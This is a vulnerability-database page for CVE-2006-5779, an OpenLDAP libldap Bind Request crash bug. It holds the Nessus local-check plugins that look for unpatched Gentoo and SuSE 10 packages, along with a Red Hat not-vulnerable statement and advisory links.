if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

flag = 0;

if (qpkg_check(package:"net-nds/openldap", unaffected:make_list("ge 2.3.27-r3", "rge 2.2.28-r5", "rge 2.1.30-r8"), vulnerable:make_list("lt 2.3.27-r3"))) flag++;

if (flag)
{
  if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());
  else security_warning(0);
  exit(0);
}
else
{
  tested = qpkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "OpenLDAP");
}
```
NASL family | SuSE Local Security Checks |
NASL id | SUSE_OPENLDAP2-CLIENT-2291.NASL |
description | OpenLDAP libldap |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 29537 |
published | 2007-12-13 |
reporter | This script is Copyright (C) 2007-2019 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/29537 |
title | SuSE 10 Security Update : openldap2-client (ZYPP Patch Number 2291) |
code

```
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The text description of this plugin is (C) Novell, Inc.
#

include("compat.inc");

if (description)
{
  script_id(29537);
  script_version ("1.12");
  script_cvs_date("Date: 2019/10/25 13:36:28");
  script_cve_id("CVE-2006-5779");
  script_name(english:"SuSE 10 Security Update : openldap2-client (ZYPP Patch Number 2291)");
  script_summary(english:"Checks rpm output for the updated packages");
  script_set_attribute(
    attribute:"synopsis",
    value:"The remote SuSE 10 host is missing a security-related patch."
  );
  script_set_attribute(
    attribute:"description",
    value:
"OpenLDAP libldap's strval2strlen() function contained a bug when
processing the authcid string of certain Bind Requests, which could
allow attackers to cause an affected application (especially the
OpenLDAP Server) to crash. (CVE-2006-5779)"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://support.novell.com/security/cve/CVE-2006-5779.html"
  );
  script_set_attribute(attribute:"solution", value:"Apply ZYPP patch number 2291.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:suse:suse_linux");
  script_set_attribute(attribute:"patch_publication_date", value:"2006/11/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/12/13");
  script_end_attributes();
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
  script_family(english:"SuSE Local Security Checks");
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");
  exit(0);
}

include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) exit(0, "Local checks are not enabled.");
if (!get_kb_item("Host/SuSE/release")) exit(0, "The host is not running SuSE.");
if (!get_kb_item("Host/SuSE/rpm-list")) exit(1, "Could not obtain the list of installed packages.");

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) exit(1, "Failed to determine the architecture type.");
if (cpu >!< "x86_64" && cpu !~ "^i[3-6]86$") exit(1, "Local checks for SuSE 10 on the '"+cpu+"' architecture have not been implemented.");

flag = 0;
if (rpm_check(release:"SLED10", sp:0, reference:"openldap2-client-2.3.19-18.11")) flag++;
if (rpm_check(release:"SLED10", sp:0, cpu:"x86_64", reference:"openldap2-client-32bit-2.3.19-18.11")) flag++;
if (rpm_check(release:"SLES10", sp:0, reference:"openldap2-client-2.3.19-18.11")) flag++;
if (rpm_check(release:"SLES10", sp:0, cpu:"x86_64", reference:"openldap2-client-32bit-2.3.19-18.11")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
  else security_warning(0);
  exit(0);
}
else exit(0, "The host is not affected.");
```
Statements
contributor | Joshua Bressers |
lastmodified | 2007-03-14 |
organization | Red Hat |
statement | Not Vulnerable. The OpenLDAP versions shipped with Red Hat Enterprise Linux 4 and earlier do not contain the vulnerable code in question. Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch. |
References
- http://gleg.net/downloads/VULNDISCO_META_FREE.tar.gz
- http://gleg.net/vulndisco_meta.shtml
- http://secunia.com/advisories/22750
- http://secunia.com/advisories/22953
- http://secunia.com/advisories/22996
- http://secunia.com/advisories/23125
- http://secunia.com/advisories/23133
- http://secunia.com/advisories/23152
- http://secunia.com/advisories/23170
- http://security.gentoo.org/glsa/glsa-200611-25.xml
- http://securityreason.com/securityalert/1831
- http://securitytracker.com/id?1017166
- http://www.mandriva.com/security/advisories?name=MDKSA-2006:208
- http://www.novell.com/linux/security/advisories/2006_72_openldap2.html
- http://www.openldap.org/its/index.cgi/Software%20Bugs?id=4740
- http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.033-openldap.html
- http://www.securityfocus.com/archive/1/450728/100/0/threaded
- http://www.securityfocus.com/bid/20939
- http://www.trustix.org/errata/2006/0066/
- http://www.ubuntu.com/usn/usn-384-1
- http://www.vupen.com/english/advisories/2006/4379
- https://exchange.xforce.ibmcloud.com/vulnerabilities/30076
- https://issues.rpath.com/browse/RPL-820